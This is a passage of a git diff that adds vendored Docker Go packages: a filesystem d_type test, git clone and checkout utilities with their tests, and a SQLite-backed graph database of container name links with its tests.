+ // for ease of setting up loopback device, we use os/exec rather than syscall.Mount + out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Skip("skipping the test because mount failed") + } + defer func() { + if err := syscall.Unmount(mountpoint, 0); err != nil { + t.Fatal(err) + } + }() + + // check whether it supports d_type + result, err := SupportsDType(mountpoint) + if err != nil { + t.Fatal(err) + } + t.Logf("Supports d_type: %v", result) + if result != expected { + t.Fatalf("expected %v, got %v", expected, result) + } +} + +func TestSupportsDTypeWithFType0XFS(t *testing.T) { + testSupportsDType(t, false, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=0") +} + +func TestSupportsDTypeWithFType1XFS(t *testing.T) { + testSupportsDType(t, true, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=1") +} + +func TestSupportsDTypeWithExt4(t *testing.T) { + testSupportsDType(t, true, "mkfs.ext4") +} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go new file mode 100644 index 0000000000..ded091f2a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go @@ -0,0 +1,100 @@ +package gitutils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/url" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/urlutil" +) + +// Clone clones a repository into a newly created directory which +// will be under "docker-build-git" +func Clone(remoteURL string) (string, error) { + if !urlutil.IsGitTransport(remoteURL) { + remoteURL = "https://" + remoteURL + } + root, err := ioutil.TempDir("", "docker-build-git") + if err != nil { + return "", err + } + + u, err := url.Parse(remoteURL) + if err != nil { + return "", err + } + + fragment := u.Fragment + clone := cloneArgs(u, root) + + if output, err := git(clone...); err != nil { + 
return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) + } + + return checkoutGit(fragment, root) +} + +func cloneArgs(remoteURL *url.URL, root string) []string { + args := []string{"clone", "--recursive"} + shallow := len(remoteURL.Fragment) == 0 + + if shallow && strings.HasPrefix(remoteURL.Scheme, "http") { + res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL)) + if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { + shallow = false + } + } + + if shallow { + args = append(args, "--depth", "1") + } + + if remoteURL.Fragment != "" { + remoteURL.Fragment = "" + } + + return append(args, remoteURL.String(), root) +} + +func checkoutGit(fragment, root string) (string, error) { + refAndDir := strings.SplitN(fragment, ":", 2) + + if len(refAndDir[0]) != 0 { + if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil { + return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) + } + } + + if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { + newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root) + if err != nil { + return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err) + } + + fi, err := os.Stat(newCtx) + if err != nil { + return "", err + } + if !fi.IsDir() { + return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx) + } + root = newCtx + } + + return root, nil +} + +func gitWithinDir(dir string, args ...string) ([]byte, error) { + a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")} + return git(append(a, args...)...) 
+} + +func git(args ...string) ([]byte, error) { + return exec.Command("git", args...).CombinedOutput() +} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go new file mode 100644 index 0000000000..d197058d20 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go @@ -0,0 +1,220 @@ +package gitutils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "testing" +) + +func TestCloneArgsSmartHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + gitURL := serverURL.String() + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("service") + w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) + }) + + args := cloneArgs(serverURL, "/tmp") + exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsDumbHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + gitURL := serverURL.String() + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/plain") + }) + + args := cloneArgs(serverURL, "/tmp") + exp := []string{"clone", "--recursive", gitURL, "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsGit(t *testing.T) { + u, _ := url.Parse("git://github.com/docker/docker") + args := cloneArgs(u, "/tmp") + exp := []string{"clone", "--recursive", "--depth", "1", "git://github.com/docker/docker", "/tmp"} + if 
!reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsStripFragment(t *testing.T) { + u, _ := url.Parse("git://github.com/docker/docker#test") + args := cloneArgs(u, "/tmp") + exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func gitGetConfig(name string) string { + b, err := git([]string{"config", "--get", name}...) + if err != nil { + // since we are interested in empty or non empty string, + // we can safely ignore the err here. + return "" + } + return strings.TrimSpace(string(b)) +} + +func TestCheckoutGit(t *testing.T) { + root, err := ioutil.TempDir("", "docker-build-git-checkout") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(root) + + autocrlf := gitGetConfig("core.autocrlf") + if !(autocrlf == "true" || autocrlf == "false" || + autocrlf == "input" || autocrlf == "") { + t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) + } + eol := "\n" + if autocrlf == "true" { + eol = "\r\n" + } + + gitDir := filepath.Join(root, "repo") + _, err = git("init", gitDir) + if err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil { + t.Fatal(err) + } + + subDir := filepath.Join(gitDir, "subdir") + if err = os.Mkdir(subDir, 0755); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil { + t.Fatal(err) + } + + if runtime.GOOS != "windows" { + if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { + t.Fatal(err) + } + + if err = os.Symlink("/subdir", 
filepath.Join(gitDir, "absolutelink")); err != nil { + t.Fatal(err) + } + } + + if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil { + t.Fatal(err) + } + + type singleCase struct { + frag string + exp string + fail bool + } + + cases := []singleCase{ + {"", "FROM scratch", false}, + {"master", "FROM scratch", false}, + {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, + {":nosubdir", "", true}, // missing directory error + {":Dockerfile", "", true}, // not a directory error + {"master:nosubdir", "", true}, + {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, + {"master:../subdir", "", true}, + {"test", "FROM scratch" + eol + "EXPOSE 3000", false}, + {"test:", "FROM scratch" + eol + "EXPOSE 3000", false}, + {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false}, + } + + if runtime.GOOS != "windows" { + // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. 
Sample output below + // git --work-tree .\repo --git-dir .\repo\.git add -A + // error: readlink("absolutelink"): Function not implemented + // error: unable to index file absolutelink + // fatal: adding files failed + cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + } + + for _, c := range cases { + r, err := checkoutGit(c.frag, gitDir) + + fail := err != nil + if fail != c.fail { + t.Fatalf("Expected %v failure, error was %v\n", c.fail, err) + } + if c.fail { + continue + } + + b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) + if err != nil { + t.Fatal(err) + } + + if string(b) != c.exp { + t.Fatalf("Expected %v, was %v\n", c.exp, string(b)) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go new file mode 100644 index 0000000000..8e61ff3b4f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go @@ -0,0 +1,19 @@ +// +build cgo + +package graphdb + +import ( + "database/sql" + + _ "github.com/mattn/go-sqlite3" // registers sqlite +) + +// NewSqliteConn opens a connection to a sqlite +// database. 
+func NewSqliteConn(root string) (*Database, error) { + conn, err := sql.Open("sqlite3", root) + if err != nil { + return nil, err + } + return NewDatabase(conn) +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go new file mode 100644 index 0000000000..eca433fa85 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go @@ -0,0 +1,551 @@ +package graphdb + +import ( + "database/sql" + "fmt" + "path" + "strings" + "sync" +) + +const ( + createEntityTable = ` + CREATE TABLE IF NOT EXISTS entity ( + id text NOT NULL PRIMARY KEY + );` + + createEdgeTable = ` + CREATE TABLE IF NOT EXISTS edge ( + "entity_id" text NOT NULL, + "parent_id" text NULL, + "name" text NOT NULL, + CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"), + CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id") + ); + ` + + createEdgeIndices = ` + CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name); + ` +) + +// Entity with a unique id. +type Entity struct { + id string +} + +// An Edge connects two entities together. +type Edge struct { + EntityID string + Name string + ParentID string +} + +// Entities stores the list of entities. +type Entities map[string]*Entity + +// Edges stores the relationships between entities. +type Edges []*Edge + +// WalkFunc is a function invoked to process an individual entity. +type WalkFunc func(fullPath string, entity *Entity) error + +// Database is a graph database for storing entities and their relationships. +type Database struct { + conn *sql.DB + mux sync.RWMutex +} + +// IsNonUniqueNameError processes the error to check if it's caused by +// a constraint violation. +// This is necessary because the error isn't the same across various +// sqlite versions. 
+func IsNonUniqueNameError(err error) bool { + str := err.Error() + // sqlite 3.7.17-1ubuntu1 returns: + // Set failure: Abort due to constraint violation: columns parent_id, name are not unique + if strings.HasSuffix(str, "name are not unique") { + return true + } + // sqlite-3.8.3-1.fc20 returns: + // Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name + if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") { + return true + } + // sqlite-3.6.20-1.el6 returns: + // Set failure: Abort due to constraint violation: constraint failed + if strings.HasSuffix(str, "constraint failed") { + return true + } + return false +} + +// NewDatabase creates a new graph database initialized with a root entity. +func NewDatabase(conn *sql.DB) (*Database, error) { + if conn == nil { + return nil, fmt.Errorf("Database connection cannot be nil") + } + db := &Database{conn: conn} + + // Create root entities + tx, err := conn.Begin() + if err != nil { + return nil, err + } + + if _, err := tx.Exec(createEntityTable); err != nil { + return nil, err + } + if _, err := tx.Exec(createEdgeTable); err != nil { + return nil, err + } + if _, err := tx.Exec(createEdgeIndices); err != nil { + return nil, err + } + + if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil { + tx.Rollback() + return nil, err + } + + if err := tx.Commit(); err != nil { + return nil, err + } + + return db, nil +} + +// Close the underlying connection to the database. 
+func (db *Database) Close() error { + return db.conn.Close() +} + +// Set the entity id for a given path. +func (db *Database) Set(fullPath, id string) (*Entity, error) { + db.mux.Lock() + defer db.mux.Unlock() + + tx, err := db.conn.Begin() + if err != nil { + return nil, err + } + + var entityID string + if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil { + if err == sql.ErrNoRows { + if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err != nil { + tx.Rollback() + return nil, err + } + } else { + tx.Rollback() + return nil, err + } + } + e := &Entity{id} + + parentPath, name := splitPath(fullPath) + if err := db.setEdge(parentPath, name, e, tx); err != nil { + tx.Rollback() + return nil, err + } + + if err := tx.Commit(); err != nil { + return nil, err + } + return e, nil +} + +// Exists returns true if a name already exists in the database. +func (db *Database) Exists(name string) bool { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return false + } + return e != nil +} + +func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error { + parent, err := db.get(parentPath) + if err != nil { + return err + } + if parent.id == e.id { + return fmt.Errorf("Cannot set self as child") + } + + if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil { + return err + } + return nil +} + +// RootEntity returns the root "/" entity for the database. +func (db *Database) RootEntity() *Entity { + return &Entity{ + id: "0", + } +} + +// Get returns the entity for a given path. 
+func (db *Database) Get(name string) *Entity { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil + } + return e +} + +func (db *Database) get(name string) (*Entity, error) { + e := db.RootEntity() + // We always know the root name so return it if + // it is requested + if name == "/" { + return e, nil + } + + parts := split(name) + for i := 1; i < len(parts); i++ { + p := parts[i] + if p == "" { + continue + } + + next := db.child(e, p) + if next == nil { + return nil, fmt.Errorf("Cannot find child for %s", name) + } + e = next + } + return e, nil + +} + +// List all entities by from the name. +// The key will be the full path of the entity. +func (db *Database) List(name string, depth int) Entities { + db.mux.RLock() + defer db.mux.RUnlock() + + out := Entities{} + e, err := db.get(name) + if err != nil { + return out + } + + children, err := db.children(e, name, depth, nil) + if err != nil { + return out + } + + for _, c := range children { + out[c.FullPath] = c.Entity + } + return out +} + +// Walk through the child graph of an entity, calling walkFunc for each child entity. +// It is safe for walkFunc to call graph functions. +func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error { + children, err := db.Children(name, depth) + if err != nil { + return err + } + + // Note: the database lock must not be held while calling walkFunc + for _, c := range children { + if err := walkFunc(c.FullPath, c.Entity); err != nil { + return err + } + } + return nil +} + +// Children returns the children of the specified entity. +func (db *Database) Children(name string, depth int) ([]WalkMeta, error) { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil, err + } + + return db.children(e, name, depth, nil) +} + +// Parents returns the parents of a specified entity. 
+func (db *Database) Parents(name string) ([]string, error) { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil, err + } + return db.parents(e) +} + +// Refs returns the reference count for a specified id. +func (db *Database) Refs(id string) int { + db.mux.RLock() + defer db.mux.RUnlock() + + var count int + if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil { + return 0 + } + return count +} + +// RefPaths returns all the id's path references. +func (db *Database) RefPaths(id string) Edges { + db.mux.RLock() + defer db.mux.RUnlock() + + refs := Edges{} + + rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id) + if err != nil { + return refs + } + defer rows.Close() + + for rows.Next() { + var name string + var parentID string + if err := rows.Scan(&name, &parentID); err != nil { + return refs + } + refs = append(refs, &Edge{ + EntityID: id, + Name: name, + ParentID: parentID, + }) + } + return refs +} + +// Delete the reference to an entity at a given path. +func (db *Database) Delete(name string) error { + db.mux.Lock() + defer db.mux.Unlock() + + if name == "/" { + return fmt.Errorf("Cannot delete root entity") + } + + parentPath, n := splitPath(name) + parent, err := db.get(parentPath) + if err != nil { + return err + } + + if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? 
AND name = ?;", parent.id, n); err != nil { + return err + } + return nil +} + +// Purge removes the entity with the specified id +// Walk the graph to make sure all references to the entity +// are removed and return the number of references removed +func (db *Database) Purge(id string) (int, error) { + db.mux.Lock() + defer db.mux.Unlock() + + tx, err := db.conn.Begin() + if err != nil { + return -1, err + } + + // Delete all edges + rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id) + if err != nil { + tx.Rollback() + return -1, err + } + changes, err := rows.RowsAffected() + if err != nil { + return -1, err + } + + // Clear who's using this id as parent + refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id) + if err != nil { + tx.Rollback() + return -1, err + } + refsCount, err := refs.RowsAffected() + if err != nil { + return -1, err + } + + // Delete entity + if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil { + tx.Rollback() + return -1, err + } + + if err := tx.Commit(); err != nil { + return -1, err + } + + return int(changes + refsCount), nil +} + +// Rename an edge for a given path +func (db *Database) Rename(currentName, newName string) error { + db.mux.Lock() + defer db.mux.Unlock() + + parentPath, name := splitPath(currentName) + newParentPath, newEdgeName := splitPath(newName) + + if parentPath != newParentPath { + return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath) + } + + parent, err := db.get(parentPath) + if err != nil { + return err + } + + rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name) + if err != nil { + return err + } + i, err := rows.RowsAffected() + if err != nil { + return err + } + if i == 0 { + return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name) + } + return nil +} + +// WalkMeta stores the walk metadata. 
+type WalkMeta struct { + Parent *Entity + Entity *Entity + FullPath string + Edge *Edge +} + +func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) { + if e == nil { + return entities, nil + } + + rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id) + if err != nil { + return nil, err + } + defer rows.Close() + + for rows.Next() { + var entityID, entityName string + if err := rows.Scan(&entityID, &entityName); err != nil { + return nil, err + } + child := &Entity{entityID} + edge := &Edge{ + ParentID: e.id, + Name: entityName, + EntityID: child.id, + } + + meta := WalkMeta{ + Parent: e, + Entity: child, + FullPath: path.Join(name, edge.Name), + Edge: edge, + } + + entities = append(entities, meta) + + if depth != 0 { + nDepth := depth + if depth != -1 { + nDepth-- + } + entities, err = db.children(child, meta.FullPath, nDepth, entities) + if err != nil { + return nil, err + } + } + } + + return entities, nil +} + +func (db *Database) parents(e *Entity) (parents []string, err error) { + if e == nil { + return parents, nil + } + + rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id) + if err != nil { + return nil, err + } + defer rows.Close() + + for rows.Next() { + var parentID string + if err := rows.Scan(&parentID); err != nil { + return nil, err + } + parents = append(parents, parentID) + } + + return parents, nil +} + +// Return the entity based on the parent path and name. +func (db *Database) child(parent *Entity, name string) *Entity { + var id string + if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil { + return nil + } + return &Entity{id} +} + +// ID returns the id used to reference this entity. +func (e *Entity) ID() string { + return e.id +} + +// Paths returns the paths sorted by depth. 
+func (e Entities) Paths() []string { + out := make([]string, len(e)) + var i int + for k := range e { + out[i] = k + i++ + } + sortByDepth(out) + + return out +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go new file mode 100644 index 0000000000..f0fb074b4d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go @@ -0,0 +1,721 @@ +package graphdb + +import ( + "database/sql" + "fmt" + "os" + "path" + "runtime" + "strconv" + "testing" + + _ "github.com/mattn/go-sqlite3" +) + +func newTestDb(t *testing.T) (*Database, string) { + p := path.Join(os.TempDir(), "sqlite.db") + conn, err := sql.Open("sqlite3", p) + db, err := NewDatabase(conn) + if err != nil { + t.Fatal(err) + } + return db, p +} + +func destroyTestDb(dbPath string) { + os.Remove(dbPath) +} + +func TestNewDatabase(t *testing.T) { + db, dbpath := newTestDb(t) + if db == nil { + t.Fatal("Database should not be nil") + } + db.Close() + defer destroyTestDb(dbpath) +} + +func TestCreateRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + root := db.RootEntity() + if root == nil { + t.Fatal("Root entity should not be nil") + } +} + +func TestGetRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + e := db.Get("/") + if e == nil { + t.Fatal("Entity should not be nil") + } + if e.ID() != "0" { + t.Fatalf("Entity id should be 0, got %s", e.ID()) + } +} + +func TestSetEntityWithDifferentName(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/test", "1") + if _, err := db.Set("/other", "1"); err != nil { + t.Fatal(err) + } +} + +func TestSetDuplicateEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if _, err := db.Set("/foo", "42"); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/foo", "43"); err == nil { + t.Fatalf("Creating an entry 
with a duplicate path did not cause an error") + } +} + +func TestCreateChild(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + child, err := db.Set("/db", "1") + if err != nil { + t.Fatal(err) + } + if child == nil { + t.Fatal("Child should not be nil") + } + if child.ID() != "1" { + t.Fail() + } +} + +func TestParents(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set("/"+a, a); err != nil { + t.Fatal(err) + } + } + + for i := 6; i < 11; i++ { + a := strconv.Itoa(i) + p := strconv.Itoa(i - 5) + + key := fmt.Sprintf("/%s/%s", p, a) + + if _, err := db.Set(key, a); err != nil { + t.Fatal(err) + } + + parents, err := db.Parents(key) + if err != nil { + t.Fatal(err) + } + + if len(parents) != 1 { + t.Fatalf("Expected 1 entry for %s got %d", key, len(parents)) + } + + if parents[0] != p { + t.Fatalf("ID %s received, %s expected", parents[0], p) + } + } +} + +func TestChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + str := "/" + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set(str+a, a); err != nil { + t.Fatal(err) + } + + str = str + a + "/" + } + + str = "/" + for i := 10; i < 30; i++ { // 20 entities + a := strconv.Itoa(i) + if _, err := db.Set(str+a, a); err != nil { + t.Fatal(err) + } + + str = str + a + "/" + } + entries, err := db.Children("/", 5) + if err != nil { + t.Fatal(err) + } + + if len(entries) != 11 { + t.Fatalf("Expect 11 entries for / got %d", len(entries)) + } + + entries, err = db.Children("/", 20) + if err != nil { + t.Fatal(err) + } + + if len(entries) != 25 { + t.Fatalf("Expect 25 entries for / got %d", len(entries)) + } +} + +func TestListAllRootChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs 
porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set("/"+a, a); err != nil { + t.Fatal(err) + } + } + entries := db.List("/", -1) + if len(entries) != 5 { + t.Fatalf("Expect 5 entries for / got %d", len(entries)) + } +} + +func TestListAllSubChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + entries := db.List("/webapp", 1) + if len(entries) != 3 { + t.Fatalf("Expect 3 entries for / got %d", len(entries)) + } + + entries = db.List("/webapp", 0) + if len(entries) != 2 { + t.Fatalf("Expect 2 entries for / got %d", len(entries)) + } +} + +func TestAddSelfAsChild(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + child, err := db.Set("/test", "1") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/test/other", child.ID()); err == nil { + t.Fatal("Error should not be nil") + } +} + +func TestAddChildToNonExistentRoot(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if _, err := db.Set("/myapp", "1"); err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/myapp/proxy/db", "2"); err == nil { + t.Fatal("Error 
should not be nil") + } +} + +func TestWalkAll(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/db/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + if err := db.Walk("/", func(p string, e *Entity) error { + t.Logf("Path: %s Entity: %s", p, e.ID()) + return nil + }, -1); err != nil { + t.Fatal(err) + } +} + +func TestGetEntityByPath(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := 
